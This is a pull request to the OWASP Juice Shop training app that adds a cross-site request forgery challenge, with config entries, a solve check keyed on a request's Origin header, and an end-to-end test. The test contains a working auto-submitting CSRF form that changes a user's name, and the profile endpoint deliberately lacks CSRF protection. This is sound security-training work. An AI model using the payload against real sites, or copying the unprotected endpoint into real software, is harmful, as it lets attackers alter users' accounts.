### PR TITLE
Add CSRF challenge

### DIFF
--- a/config.schema.yml
+++ b/config.schema.yml
@@ -605,3 +605,8 @@ ctf:
         type: string
       code:
         type: string
+    csrfChallenge:
+      name:
+        type: string
+      code:
+        type: string

--- a/config/fbctf.yml
+++ b/config/fbctf.yml
@@ -286,3 +286,6 @@ ctf:
     exposedMetricsChallenge:
       name: Japan
       code: JP
+    csrfChallenge:
+      name: Luxembourg
+      code: LU

--- a/data/static/challenges.yml
+++ b/data/static/challenges.yml
@@ -773,9 +773,9 @@
   key: exposedMetricsChallenge
 -
   name: 'CSRF'
-  category: 'Cross-Origin Issues'
+  category: 'Broken Access Control'
   description: 'Change the name of a user by performing Cross-Site Request Forgery from <a href="http://htmledit.squarefree.com">another origin</a>.'
   difficulty: 3
   hint: 'Find a form which updates the username and then construct a malicious page in the online HTML editor.'
-  hintUrl: ''
+  hintUrl: 'https://pwning.owasp-juice.shop/part2/broken-access-control.html#change-the-name-of-a-user-by-performing-cross-site-request-forgery-from-another-origin'
   key: csrfChallenge

--- a/data/static/challenges.yml
+++ b/data/static/challenges.yml
@@ -771,3 +771,11 @@
   hint: 'Try to guess what URL the endpoint might have.'
   hintUrl: 'https://pwning.owasp-juice.shop/part2/sensitive-data-exposure.html#find-the-endpoint-that-serves-usage-data-to-be-scraped-by-a-popular-monitoring-system'
   key: exposedMetricsChallenge
+-
+  name: 'CSRF'
+  category: 'Cross-Origin Issues'
+  description: 'Change the name of a user by performing Cross-Site Request Forgery from <a href="http://htmledit.squarefree.com">another origin</a>.'
+  difficulty: 3
+  hint: 'Find a form which updates the username and then construct a malicious page in the online HTML editor.'
+  hintUrl: ''
+  key: csrfChallenge

--- a/routes/updateUserProfile.js
+++ b/routes/updateUserProfile.js
@@ -5,6 +5,9 @@
 
 const models = require('../models/index')
 const insecurity = require('../lib/insecurity')
+const utils = require('../lib/utils')
+const cache = require('../data/datacache')
+const challenges = cache.challenges
 
 module.exports = function updateUserProfile () {
   return (req, res, next) => {
@@ -12,6 +15,11 @@ module.exports = function updateUserProfile () {
 
     if (loggedInUser) {
       models.User.findByPk(loggedInUser.data.id).then(user => {
+        /* Challenge is solved if request originated from a known HTML ODE and sets a new username */
+        if (req.headers.origin.includes('://htmledit.squarefree.com') && req.body.username && utils.notSolved(challenges.csrfChallenge)) {
+          utils.solve(challenges.csrfChallenge)
+        }
+
         return user.update({ username: req.body.username })
       }).catch(error => {
         next(error)

--- a/routes/updateUserProfile.js
+++ b/routes/updateUserProfile.js
@@ -15,7 +15,7 @@ module.exports = function updateUserProfile () {
 
     if (loggedInUser) {
       models.User.findByPk(loggedInUser.data.id).then(user => {
-        utils.solveIf(challenges.csrfChallenge, () => { return (req.headers.origin.includes('://htmledit.squarefree.com') && req.body.username !== user.username })
+        utils.solveIf(challenges.csrfChallenge, () => { return req.headers.origin.includes('://htmledit.squarefree.com') && req.body.username !== user.username })
         return user.update({ username: req.body.username })
       }).catch(error => {
         next(error)

--- a/routes/updateUserProfile.js
+++ b/routes/updateUserProfile.js
@@ -15,11 +15,7 @@ module.exports = function updateUserProfile () {
 
     if (loggedInUser) {
       models.User.findByPk(loggedInUser.data.id).then(user => {
-        /* Challenge is solved if request originated from a known HTML ODE and sets a new username */
-        if (req.headers.origin.includes('://htmledit.squarefree.com') && req.body.username && utils.notSolved(challenges.csrfChallenge)) {
-          utils.solve(challenges.csrfChallenge)
-        }
-
+        utils.solveIf(challenges.csrfChallenge, () => { return (req.headers.origin.includes('://htmledit.squarefree.com') && req.body.username !== user.username })
         return user.update({ username: req.body.username })
       }).catch(error => {
         next(error)

--- a/test/e2e/profileSpec.js
+++ b/test/e2e/profileSpec.js
@@ -66,4 +66,17 @@ describe('/profile', () => {
     })
     protractor.expect.challengeSolved({ challenge: 'SSRF' })
   })
+
+  describe('challenge "csrf"', () => {
+    it('should be possible to perform a CSRF attack against the user profile page', () => {
+      browser.waitForAngularEnabled(false)
+      browser.driver.get('http://htmledit.squarefree.com')
+      browser.driver.sleep(1000)
+      /* The script executed below is equivalent to pasting this string into http://htmledit.squarefree.com: */
+      /* <form action="http://localhost:3000/profile" method="POST"><input type="hidden" name="username" value="CSRF"/><input type="submit"/></form><script>document.forms[0].submit();</script> */
+      browser.executeScript("document.getElementsByName('editbox')[0].contentDocument.getElementsByName('ta')[0].value = \"<form action=\\\"http://localhost:3000/profile\\\" method=\\\"POST\\\"><input type=\\\"hidden\\\" name=\\\"username\\\" value=\\\"CSRF\\\"/><input type=\\\"submit\\\"/></form><script>document.forms[0].submit();</script>\"")
+      browser.driver.sleep(1000)
+    })
+    protractor.expect.challengeSolved({ challenge: 'CSRF' })
+  })
 })

--- a/test/e2e/profileSpec.js
+++ b/test/e2e/profileSpec.js
@@ -75,7 +75,8 @@ describe('/profile', () => {
       /* The script executed below is equivalent to pasting this string into http://htmledit.squarefree.com: */
       /* <form action="http://localhost:3000/profile" method="POST"><input type="hidden" name="username" value="CSRF"/><input type="submit"/></form><script>document.forms[0].submit();</script> */
       browser.executeScript("document.getElementsByName('editbox')[0].contentDocument.getElementsByName('ta')[0].value = \"<form action=\\\"http://localhost:3000/profile\\\" method=\\\"POST\\\"><input type=\\\"hidden\\\" name=\\\"username\\\" value=\\\"CSRF\\\"/><input type=\\\"submit\\\"/></form><script>document.forms[0].submit();</script>\"")
-      browser.driver.sleep(1000)
+      browser.driver.sleep(5000)
+      browser.waitForAngularEnabled(true)
     })
     protractor.expect.challengeSolved({ challenge: 'CSRF' })
   })


### PR DESCRIPTION
### Implementation
The user profile page is extended to recognize when a new username is set from a remote origin, more specifically from http://htmledit.squarefree.com. It is important that this origin is not using TLS, as Juice Shop instances are in most cases not accessed via TLS either (otherwise there will be issues with [mixed content](https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content)). Using well known online editors such as JSFiddle or CodePen is therefore not possible, as they are only available via TLS.
### Alternative editors
Limiting the challenge to one very simple editor is the easiest way. Alternative approaches could be:
- Use of a configurable whitelist of origins which are hosting online HTML editors.
- Hosting a dedicated instance of an online HTML editor by the Juice Shop project (e.g. something like htmledit.owasp-juice.shop)

I think it would not be a good idea to react on any origin, as scanners could also send requests with arbitrary origins, which then can result in the challenge being incorrectly displayed as solved.
### Relation to other challenges
The way we approach the cross-origin scenario in this challenge does also have implications on how we can handle requested (see #1312) or existing challenges ("Email Leak") that involve different origins.

Closes #902 